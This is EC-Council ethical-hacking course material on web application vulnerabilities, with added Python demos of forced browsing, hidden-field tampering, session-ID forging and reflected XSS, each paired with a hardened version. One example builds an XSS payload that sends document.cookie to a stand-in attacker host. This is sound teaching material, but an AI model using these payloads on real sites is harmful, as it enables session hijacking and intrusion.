Ethical Hacking Module XII Web Application Vulnerabilities

Page 1: Ethical Hacking Module XII Web Application Vulnerabilities

Ethical Hacking

Module XII

Web Application Vulnerabilities

EC-Council

Module Objective

• Understanding Web Application Security
• Common Web Application Security Vulnerabilities
• Web Application Penetration Methodologies
• Input Manipulation
• Authentication And Session Management
• Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth
• Countermeasures


Understanding Web Application Security

(Diagram: User, Firewall, Web Server running the Web App Scripts, a second Firewall, Database. Both firewalls pass HTTP through, so an attack carried inside an ordinary web request reaches the application and, through it, the database.)


Common Web Application Vulnerabilities

• Reliance on client-side data
• Special characters that have not been escaped
• Missing HTML output character filtering
• Web applications running with root privileges
• Authentication performed in ActiveX/JavaScript on the client
• Lack of user authentication before performing critical tasks


Web Application Penetration Methodologies

Information Gathering and Discovery

• Documenting Application / Site Map

• Identifiable Characteristics / Fingerprinting

• Signature Error and Response Codes

• File / Application Enumeration

– Forced Browsing

– Hidden Files

– Vulnerable CGIs

– Sample Files

Input/Output Client-Side Data Manipulation
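The enumeration steps above carried out in code, as an added example (this is not EC-Council's code): forced browsing over a wordlist, with the site's own "not found" signature learned first so that a custom error page served with status 200 is not reported as a hit. The in-memory site, its paths, the wordlist and the fetch function are constructed for the demo; against a real target, fetch would be an HTTP GET.

```python
import secrets
from dataclasses import dataclass

# Constructed sample site: path -> (status, body). Its custom "not found" page is
# served with status 200, which fools a scanner that trusts status codes alone.
SAMPLE_SITE = {
    "/": (200, "<html>Welcome to the shop</html>"),
    "/admin/": (403, "<html>Forbidden</html>"),
    "/backup.zip": (200, "PK\x03\x04 ...zip bytes..."),
    "/cgi-bin/test-cgi": (200, "CGI/1.0 test script report"),
    "/samples/": (200, "<html>Sample files</html>"),
}
SOFT_404_BODY = "<html>Sorry, we could not find that page. <a href='/'>Home</a></html>"


def fetch(path):
    """Stand-in for an HTTP GET (constructed): unknown paths get the soft 404."""
    return SAMPLE_SITE.get(path, (200, SOFT_404_BODY))


@dataclass
class Finding:
    path: str
    status: int
    note: str


def not_found_signature(fetcher):
    """Request a path that cannot exist and keep its body: that body is the site's
    'not found' signature (the slide's "Signature Error and Response Codes")."""
    probe = "/" + secrets.token_hex(12)
    _, body = fetcher(probe)
    return body


def naive_browse(fetcher, wordlist):
    """A scanner that trusts status codes: every guess comes back 200 here."""
    return [p for p in wordlist if fetcher(p)[0] == 200]


def forced_browse(fetcher, wordlist):
    """Forced browsing: report paths whose response is neither a 404 nor the
    soft-404 signature. A 403 still confirms that the path exists."""
    baseline = not_found_signature(fetcher)
    findings = []
    for path in wordlist:
        status, body = fetcher(path)
        if status == 404 or body == baseline:
            continue
        if status == 403:
            note = "exists but forbidden"
        elif status == 200:
            note = "accessible"
        else:
            note = f"unexpected status {status}"
        findings.append(Finding(path, status, note))
    return findings


# Constructed wordlist covering the slide's categories (hidden files, vulnerable
# CGIs, sample files) plus two guesses that do not exist on the sample site.
WORDLIST = ["/admin/", "/backup.zip", "/cgi-bin/test-cgi", "/samples/", "/old/", "/.git/"]

if __name__ == "__main__":
    print("naive:", naive_browse(fetch, WORDLIST))
    for f in forced_browse(fetch, WORDLIST):
        print(f"{f.status} {f.path}: {f.note}")
```

Against a live target, compare on a normalised body (strip timestamps, request IDs and the guessed path itself) rather than on the raw bytes, since dynamic error pages rarely repeat exactly; the body comparison here is the idea, not a finished matcher.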


Hacking Tool: Instant Source

http://www.blazingtool.com

Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!

The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.


Hacking Tool: Lynx

http://lynx.browser.org

Lynx is a text-based browser used for downloading source files and directory links.


Hacking Tool: Wget

www.gnu.org/software/wget/wget.html

Wget is a command line tool for Windows and Unix that will download the contents of a web site. It works non-interactively, so it keeps working in the background after you have logged off. Wget works particularly well with slow or unstable connections, continuing to retrieve a document until it is fully downloaded.

Both HTTP and FTP retrievals can be time-stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.


Hacking Tool: Black Widow

http://softbytelabs.com

Black Widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.

Use it to scan a site and create a complete profile of the site's structure, files, E-mail addresses, external links and even link errors.


Hacking Tool: WebSleuth

http://sandsprite.com/sleuth/

WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.


Hidden Field Manipulation

Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.

Hidden fields serve as a means for the web application to pass information between its different pages and components.

Using this method, an application may pass the data without saving it to a common backend system (typically a database).

A major assumption about hidden fields is that since they are not visible (i.e. hidden) they will not be viewed or changed by the client.

Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.

By changing the value, the attacker alters the logic that ties the different parts of the application together: the server processes the tampered value as if it had produced it itself, and the application is manipulated accordingly.


Input Manipulation

URL Manipulation - CGI Parameter Tampering

HTTP Client-Header Injection

Filter/Intrusion Detection Evasion

Protocol/Method Manipulation

Overflows
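Hidden field manipulation (previous slide) and CGI parameter tampering (this slide) are the same attack on different carriers, shown here as an added example that is not EC-Council's code. A checkout page embeds the price in a hidden field; the attacker edits the field or the raw POST body. The vulnerable handler trusts the client, the hardened handler looks the price up server-side, and a third handler shows the one acceptable way to let state round-trip through the client: an HMAC the server verifies. The catalog, prices, key and parameter names are constructed for the demo.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

# Constructed catalog (prices in cents) and signing key; in a real deployment the
# key comes from configuration and never appears in a page.
CATALOG = {"widget": 4999, "gadget": 1299}
SERVER_KEY = b"constructed-demo-key"


def render_form_vulnerable(item):
    """The checkout form as the server sends it: the price rides in a hidden field."""
    return (f'<form method="POST" action="/checkout">'
            f'<input type="hidden" name="item" value="{item}">'
            f'<input type="hidden" name="price" value="{CATALOG[item]}">'
            f'<input type="submit" value="Buy"></form>')


def checkout_vulnerable(post_body):
    """Charges whatever price the client posted back."""
    form = parse_qs(post_body)
    return int(form["price"][0])


def checkout_hardened(post_body):
    """Ignores any client-supplied price: the only input is the item name, and it
    is validated against the catalog. parse_qs handles a query string the same
    way, so this also covers URL parameter tampering."""
    form = parse_qs(post_body)
    item = form.get("item", [""])[0]
    if item not in CATALOG:
        raise ValueError("unknown item")
    return CATALOG[item]


def sign(item, price):
    """HMAC over item and price together, so a price signed for a cheaper item
    cannot be pasted onto a dearer one."""
    return hmac.new(SERVER_KEY, f"{item}|{price}".encode(), hashlib.sha256).hexdigest()


def signed_fields(item):
    """Hidden fields for the case where state really must round-trip via the client."""
    price = str(CATALOG[item])
    return {"item": item, "price": price, "mac": sign(item, price)}


def checkout_signed(post_body):
    """Rejects any item/price pair the server did not sign itself."""
    form = parse_qs(post_body)
    item, price, mac = (form.get(k, [""])[0] for k in ("item", "price", "mac"))
    if not hmac.compare_digest(mac, sign(item, price)):
        raise ValueError("tampered hidden field")
    return int(price)


def accepted(handler, post_body):
    """True if the handler accepts the request (used to compare the handlers)."""
    try:
        handler(post_body)
        return True
    except ValueError:
        return False


def legit_body(item="widget"):
    """What the browser posts if the form is submitted unchanged."""
    return urlencode({"item": item, "price": CATALOG[item]})


def tampered_body(item="widget", price=1):
    """What an attacker posts after editing the hidden field or the raw request."""
    return urlencode({"item": item, "price": price})


if __name__ == "__main__":
    print(render_form_vulnerable("widget"))
    print("vulnerable charges:", checkout_vulnerable(tampered_body()))
    print("hardened charges:", checkout_hardened(tampered_body()))
```

The MAC stops tampering but not replay: a signed price captured today can be resubmitted after the price goes up, so a signed field should also carry an expiry or a nonce the server remembers. Keeping the state in a server-side session avoids the problem entirely.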


What is Cross-Site Scripting (XSS)?

A web application vulnerable to XSS allows attacker-supplied data to be returned to a user's browser, where it runs as if it came from the application itself: the victim inadvertently sends the malicious data to themselves through that application.

Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them.

These links cause client-side script (VBScript, JavaScript, etc.) of the attacker's choice to execute in the victim's browser, within the application's own origin, so it can read that site's cookies and act on the user's behalf.

XSS vulnerabilities are caused by a failure in the web application to properly validate user input and to encode it before writing it into the HTML it returns.


Authentication And Session Management

Brute/Reverse Force

Session Hijacking

Session Replay

Session Forging

Page Sequencing
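Three of the items above in working code, as an added example that is not EC-Council's code: sequential session IDs that let a user forge a neighbour's session, random IDs with server-side page sequencing that refuse a step whose predecessor was skipped, and login throttling that counts failures per source address as well as per account, because a reverse brute force (one password against many accounts) never trips a per-account lockout. User names, the checkout steps, the limits and the attacker's address are constructed for the demo.

```python
import itertools
import secrets


class WeakSessionStore:
    """Sequential session IDs: a user who sees their own ID can compute a
    neighbour's and hijack that session without sniffing anything."""

    def __init__(self):
        self._ids = itertools.count(1000)
        self._sessions = {}

    def login(self, user):
        sid = str(next(self._ids))
        self._sessions[sid] = {"user": user}
        return sid

    def user_for(self, sid):
        return self._sessions.get(sid, {}).get("user")


def forge_neighbour(store, my_sid):
    """The attacker's move against sequential IDs: decrement and present it."""
    return store.user_for(str(int(my_sid) - 1))


CHECKOUT_STEPS = ["cart", "address", "payment", "confirm"]  # constructed flow


class SessionStore:
    """Random 128-bit IDs from the OS CSPRNG, plus server-side tracking of how far
    through the checkout flow the session has come (page sequencing)."""

    def __init__(self):
        self._sessions = {}

    def login(self, user):
        sid = secrets.token_urlsafe(16)  # 16 random bytes: not guessable or enumerable
        self._sessions[sid] = {"user": user, "step": 0}
        return sid

    def user_for(self, sid):
        return self._sessions.get(sid, {}).get("user")

    def visit(self, sid, step):
        """Accept step N only if the session has completed step N-1, so typing the
        'confirm' URL directly is refused. Unknown sessions are refused too."""
        session = self._sessions.get(sid)
        if session is None:
            return False
        wanted = CHECKOUT_STEPS.index(step)
        if wanted != session["step"]:
            return False
        session["step"] = wanted + 1
        return True


class LoginGuard:
    """Throttle failed logins per account (plain brute force) and per source
    address (reverse brute force, which a per-account lockout never notices)."""

    def __init__(self, per_account=5, per_source=20):
        self.per_account, self.per_source = per_account, per_source
        self.failed_by_account = {}
        self.failed_by_source = {}

    def allowed(self, user, source):
        return (self.failed_by_account.get(user, 0) < self.per_account
                and self.failed_by_source.get(source, 0) < self.per_source)

    def record_failure(self, user, source):
        self.failed_by_account[user] = self.failed_by_account.get(user, 0) + 1
        self.failed_by_source[source] = self.failed_by_source.get(source, 0) + 1


def reverse_brute_force_demo(guard, source="203.0.113.5", attempts=25):
    """Constructed attacker: one password against `attempts` different accounts
    from a single address. Returns how many attempts the guard let through."""
    let_through = 0
    for i in range(attempts):
        user = f"user{i}"
        if guard.allowed(user, source):
            let_through += 1
            guard.record_failure(user, source)
    return let_through


if __name__ == "__main__":
    weak = WeakSessionStore()
    weak.login("alice")
    print("forged from", weak.login("mallory"), "->", forge_neighbour(weak, "1001"))
    print("reverse brute force attempts allowed:", reverse_brute_force_demo(LoginGuard()))
```

Session replay is outside what this snippet can show; the usual controls are short idle timeouts, rotating the ID on login and on privilege change, and binding the session to the TLS channel, none of which the store above implements.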


Traditional XSS Web Application Hijack Scenario - Cookie stealing

The user is logged on to a web application and the session is currently active. An attacker knows of an XSS hole that affects that application. The user receives a malicious XSS link via e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. a guest book, a banner, etc.) and make it load automatically without requiring user intervention. When the injected script runs in the victim's browser it reads document.cookie and sends the value to a host the attacker controls; with the session cookie in hand, the attacker presents it to the application and takes over the active session.


XSS Countermeasures

As a web application user, there are a few ways to protect yourself from XSS attacks.

The first and most effective solution is to disable all scripting language support in your browser and email reader.

If this is not a feasible option for business reasons, another recommendation is to use reasonable caution when clicking links in anonymous e-mails and on dubious web pages.

Proxy servers can help filter out malicious scripting in HTML, although filters of this kind are routinely bypassed with alternative encodings and tag forms.

These are user-side mitigations only. The hole itself is closed on the server by validating input and encoding every user-supplied value written into HTML, and the damage from a residual hole is limited by marking the session cookie HttpOnly so that script cannot read it.
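The XSS definition, the cookie-stealing scenario and the countermeasures above, as one added example that is not EC-Council's code: a page that reflects a query parameter into HTML, the payload from the hijack scenario, and the same page with output encoding and allow-list validation. The page template, the parameter name, the host names and the payload are constructed for the demo.

```python
import html
import re
from urllib.parse import parse_qs, urlencode


def query_of(url):
    """Just the query string of a URL (what the server-side handler receives)."""
    return url.split("?", 1)[1] if "?" in url else ""


def page_vulnerable(query):
    """Reflected XSS: the 'name' parameter is written straight into the HTML."""
    name = parse_qs(query).get("name", ["guest"])[0]
    return f"<html><body><h1>Hello {name}</h1></body></html>"


def page_hardened(query):
    """Same page with output encoding: characters that have meaning in HTML are
    escaped before the value is placed in the document, so it renders as text."""
    name = parse_qs(query).get("name", ["guest"])[0]
    return f"<html><body><h1>Hello {html.escape(name, quote=True)}</h1></body></html>"


NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' -]{0,39}$")


def validate_name(name):
    """Allow-list input validation. It narrows what gets in; it does not replace
    output encoding, because the same value may later be echoed in other contexts."""
    return bool(NAME_RE.match(name))


# The cookie-stealing payload from the hijack scenario (attacker host is constructed):
# the script reads document.cookie and ships it off inside an image request.
PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
MALICIOUS_URL = "http://shop.example/hello?" + urlencode({"name": PAYLOAD})


def script_runs(document):
    """Rough check used by the demo: does the page contain a live <script> tag?"""
    return "<script>" in document


def handle(query):
    """The hardened handler end to end: reject input outside the allow-list, and
    encode whatever is echoed back."""
    name = parse_qs(query).get("name", ["guest"])[0]
    if not validate_name(name):
        return "<html><body><h1>Hello guest</h1></body></html>"
    return page_hardened(query)


if __name__ == "__main__":
    q = query_of(MALICIOUS_URL)
    print("vulnerable:", page_vulnerable(q))
    print("hardened:  ", page_hardened(q))
```

html.escape is correct for text between tags and for quoted attribute values; a value placed inside a script block, a URL or a CSS rule needs the encoding for that context instead. Pair the encoding with a Set-Cookie header carrying HttpOnly and Secure, so a script that does slip through cannot read the session cookie and the cookie never travels over plain HTTP.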


Buffer Overflow in WINHLP32.EXE

A buffer-overrun vulnerability in WINHLP32.EXE could result in the execution of arbitrary code on the vulnerable system.

This vulnerability stems from a flaw in the Item parameter within the WinHLP Command.

This exploit would execute in the security context of the currently logged on user.

Microsoft has released Windows 2000 Service Pack 3 (SP3), which includes a fix for this vulnerability.


Hacking Tool: Helpme2.pl

Helpme2.pl is exploit code for the WinHelp32.exe Remote Buffer Overrun vulnerability.

This tool generates an HTML file with a given hidden command.

When this HTML file is sent to a victim through e-mail and opened, it triggers the overrun on the victim's computer and executes the hidden command.


Hacking Tool: WindowBomb

An e-mail sent with this HTML file attached will create pop-up windows until the PC's memory is exhausted.

A few lines of JavaScript are enough to mount this kind of denial of service against the browser.


Hacking Tool: IEEN

http://www.securityfriday.com/ToolDownload/IEen

IEEN remotely controls Internet Explorer using DCOM. If you know the account name and the password of a remote machine, you can remotely control the software components on it using DCOM. Internet Explorer is one of the programs that can be controlled this way.


Summary

Attacking web applications is often the easiest way to compromise hosts, networks and users.

Generally nobody notices web application penetration until serious damage has been done.

Web application vulnerabilities can be eliminated to a great extent by ensuring proper design specifications and coding practices, as well as by implementing common security procedures.

Various tools help the attacker view the source code and scan for security holes.

The first rule in web application development from a security standpoint is not to rely on client-side data for critical processes. Keep critical state in a server-side session, protected by an encrypted (SSL) connection and "secure" cookies, instead of in hidden fields, which are easily manipulated by attackers. SSL on its own does not help here: it protects data from third parties in transit, not from the client, who can alter a hidden field before the request is ever encrypted.

A cross-site scripting vulnerability is caused by the failure of a web-based application to validate user-supplied input and encode it before returning it to the client system.

If the application accepts only expected input and encodes everything it echoes back, XSS can be significantly reduced.